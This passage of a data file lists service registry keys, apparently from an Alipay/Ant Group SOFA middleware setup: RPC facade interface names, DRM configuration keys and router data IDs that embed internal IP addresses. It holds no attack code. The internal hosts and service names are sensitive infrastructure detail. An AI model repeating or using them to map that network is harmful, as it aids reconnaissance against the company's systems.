SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingprod.common.service.facade.catalog.CatalogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alsc.testengine.api.EngineExecutor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gffintrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.appointment.service.AppointmentHistoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.sendPush,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dwsap.common.service.facade.subscribe.MailSubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.console.OssServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettle.facade.api.SettleAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.smartcacheUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financeprod.fund.facade.api.MoneyFundWithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchstoreapp.common.service.facade.store.manage.BusinessAreaOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:appstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CertDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.195.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sdaota.common.service.client.service.OtaDownService:1.0:sdaota@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.integration.einvoice.EinvoiceAgentServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.lbs.LBSAdcodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.app3.Interface3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.ProjectBugExtendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.end2end.EndToEndFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.socialTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_INCOME#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.plugin.IscElementMngAlipayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:finbatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.mission.PcreditActivityCoreMissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:csoperationmng#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iexratecenter.service.facade.api.ExClientAgrMappingQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZPRODMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","algox@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.etetestcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.paybox.SmartPayBoxDynamicCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.50.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.common.service.facade.config.ServicePlanConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsecurityprod.common.service.facade.namelist.NamelistItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:sdaxconnectplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-polaristwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_recovery_task.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsnsbff:name=com.alipay.finsnsbff.topic.tinyTopicDetailForceUseFortuneInfoTopicIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcactivitycore.facade.play.group.GroupPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pfunddts@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.api.DataTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.biz.lfc.rpc.LifeCircleContentPBService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wkprod.common.service.facade.pay.WkCardBillInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.SystemParameterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:ugstrategycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcmloanprod.common.service.facade.service.MiniLoanApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.finstore.CaifuhaoShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:metadataProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:merchantSignF2FCheckValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finscprod.facade.activity.StockVoteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vein.winbillboard.common.service.facade.injection.InjectionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.resourceMarkerConfigs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.newsPropagationLevelLow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instopen.workflow.service.facade.ProcessManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.165.169.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.jiuzhou.boss.facade.sofarest.UserSofarestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mshopprod.common.service.alsc.item.AlscItemSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryConfigRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.manager.MappingComponentDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:aircoreservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcreditcheck#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.afts.common.service.facade.SchedulerMasterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:publicDomain_zmcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_MEMBER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.realtimecheckprod.biz.serviceimp.service.opscloud.OpsCldSearchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers__NS_100.83.95.178_notify#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finpwm.finpwmXTradeSlaveDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.echox.drm.EchoxSpecialDrm.updateEchoxConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.facade.watchlist.UserReadRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:huanyu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.inner.RegionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.shop.triple.TripleQueryShopService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.mng.VdnDispatchRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.processmngTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.service.facade.PaycoreAccountTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:isdispatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.PrivateFundInventoryQuery:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.CurrentLimitConfigDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.miniapp.miniappfacade.MiniAppUserinfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0:mpromoProcessAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.biz.asset.service.AssetIsolationAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.xy.SyncUitMockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.113.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucns.common.service.facade.MessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvMerchantProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpunish.facade.interception.RiskDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.102.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfcenter.common.service.facade.WriteOffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:serverlesssdk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.kwlib:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finaicontentcore.api.alive.SubtitleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.grayprod.change.drm.ChangePolicy.statusChangePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.173.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.extend-request:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.decision.DecisionDataManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.169.232#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.185.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.emc.common.service.facade.api.EmcApplicationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingcore.common.service.facade.InsSaleSellerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:iotcms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.CostStatisticFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.supergw.service.facade.transaction.TransReceiverService:1.0:supergw.d11333aqcn.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.category.facade.CategoryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.payment.PayeeCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AppResourceManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOBILEPAYFRONT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.facade.JobOpenApiFacade:1.0:ischedulerconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw.d189.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.bizroute.GroupAttentionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.union.drm.MerchantUnionParamsDrmResource.globalCityString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscprod.facade.prophet.UserPropsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.mcenter.auto.daointerface.McenterMiniAccountLogDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.manager.RuleManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filebridge.service.facade.workbench.FileFactorySerialService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.gateway.GatewayFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mrchservbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.BiometricSecurityKeyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.nebula.MobileAppRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_login_sim@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.StuffApplyOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filebridge.service.facade.FileBridgeSlipService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.shopminiapp.facade.api.upgrade.ShopUpgradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.paycore.PmtDbkStyRuleCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personalprod.service.facade.calendar.DeductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeexprod.biz.common.exterface.validator.ExterfaceValidator:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrenewprod.common.service.facade.api.continuous.InsContinuousCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdalproxy.interfaces.endpoint.facade.rest.api.SchemaServerPropsApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_F_ZDOMAIN_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.reading.common.service.facade.content.ContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.call.BPCall:1.0:receiverCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.instrument.StockDividendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.fault.GrayFaultSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdltest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:abilitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.comparacenter.common.service.facade.load.api.ComParaDataLoadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.asbi.AsbiItemRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.plan.SchedulePlanService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:ifcriskmatrixus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.175.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers__NOTIFYTEST_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.discount.common.service.facade.DiscountApplyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.filex.staging.StagingFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.clientBillCacheCheckSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:graphiql-ide#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zcache.tbase.idatacontextTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.withdraw.api.GzoneWithdrawQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.profitcore.facade.IncomeCalculateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.engine.cert.client.facade.CertServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.miniappkeep.MiniAppKeepBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:iottestpower@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.31.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:GlobalNet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchpay.service.batch.bwfb.api.bg.WithholdingCacheManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.visitrecord.VisitRecordSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.grid.leads.SalesLeadsGridQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcateringprod.common.service.facade.dish.CommodityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelCoreEvaluatorResource.closeAllModelSnapshotStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.biz.group.rpc.GroupCommonRpcJsonpService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.prodquery.common.service.ldc.drm.PdcoreZoneRouteConfigDRM.defaultGZone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.AsrProcessResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:livetradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.himalaya.common.service.facade.api.ServiceReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:innertransAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.open.facade.decision.mng.api.DecisionConfigOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:postmen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.156.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_M_DEDUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acmeteragecore.common.service.facade.MeterDataQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.arcore.common.service.facade.ArBatchOperateFacade:1.0:zhiMaArBatchOperateFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charge.service.facade.ChargeQuotaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.biz.service.impl.sim.KbsalesEventSimulateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.138.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.bizmonlog.api.BizMonConfManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-seeconference@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.commsync.CommonSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.RCacheServerTBaseCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.biz.lfc.rpc.LifeCircleContentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.LeadsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.CapitalPlanDecideFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kwlib@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecsa.common.service.facade.AnonymousPicConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.193.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.yeb.YebTransferQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauditcenter.facade.SubscriptionFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.schedulerTask.CensorScheTaskRecService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mdiscountprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zprod.face.service.facesearch.repository.HotFaceRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArrangementQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.168.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfinvest.facade.api.after.InvestAfterCUSManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.ipaysales.facade.api.audit.IpaysalesAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.142.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:opssla-ZAXHBXCN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.MarketDrmServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.UserRelieveQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:financingcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.